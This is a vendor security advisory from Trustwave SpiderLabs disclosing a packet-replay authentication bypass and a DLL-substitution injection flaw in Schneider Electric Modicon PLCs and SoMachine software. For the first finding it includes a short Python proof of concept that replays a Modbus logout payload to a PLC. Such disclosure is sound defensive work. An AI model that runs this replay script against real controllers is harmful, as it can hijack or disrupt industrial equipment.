Trustwave SpiderLabs Security Advisory TWSL2020-001: Multiple Vulnerabilities in Schneider Electric Products Published: 05/07/20 Version: 1.0 Vendor: Schneider Electric (https://www.se.com/) Finding 1: Authentication Bypass by Capture-replay ***************Credit: Seok Min Lim of Trustwave Product: Modicon M221 Version affected: All CVE: CVE-2017-6034 CWE: 294 In SoMachine Basic v1.6 Build 62620, there is a man-in-the-middle attack vulnerability where unauthorized users are able to replay packets and terminate authorized user connection to the PLC. If an attacker exploits this vulnerability, the user will be logged off the PLC, allowing attacker to communicate with PLC and perform further administrative actions. Please note that this attack requires the attacker to spoof the IP of the OS that SoMachine is logged into. Please note that this vulnerability was originally discovered by Eran Goldstein (CRITIFENCE) and Benjamin Green (Lancaster University). This vulnerability description and mitigation were updated due to additional research. Previously it was stated that these conditions occurred due to the PLC did not check the authenticity of the packets. However, it was discovered that the target PLC can still accept any requests from the 3rd party even with a given valid session. This reflects the lack of authorization. As a proof of concept, the following Python Script will replay the packet "Logout" twice to the PLC. #Run using python 3 import socket payload = "00d600000004015a9c11" serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) port = 502 ipAddress = "172.16.0.4" serversocket.connect_ex((ipAddress, port)) serversocket.send(bytes.fromhex(payload)) serversocket.send(bytes.fromhex(payload)) print("Payload Sent!") Finding 2: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') ***************Credit: Seok Min Lim and Johnny Pan of Trustwave Products: SoMachine Basic, EcoStruxure Machine Expert, Modicon M100 Logic Controller, Modicon M200 Logic Controller, Modicon M221 Logic Controller Version affected: All versions CVE: CVE-2020-7489 CWE: 74 There is a vulnerability that attackers can use to substitute a modified DLL to allow malicious codes to be transferred to the controller. The attacker will be able to change the behaviour of the functions. One such scenario will be changing the "Start" command to "Stop", disallowing the OT engineer to "Start" the controller from the software. Remediation Steps: Upgrade the affected software/firmware to the latest version. Revision History: 04/17/2019 - Vulnerabilities disclosed to vendor 08/13/2019 - Existing CVE expanded to include mitigations for first issue 02/20/2020 - PoC provided for replication of second issue 04/14/2020 - Patch released by vendor 05/07/2020 - Advisory published References 1. https://www.se.com/ww/en/download/document/SEVD-2017-065-01/ 2. https://www.se.com/ww/en/download/document/SEVD-2020-105-01/ About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.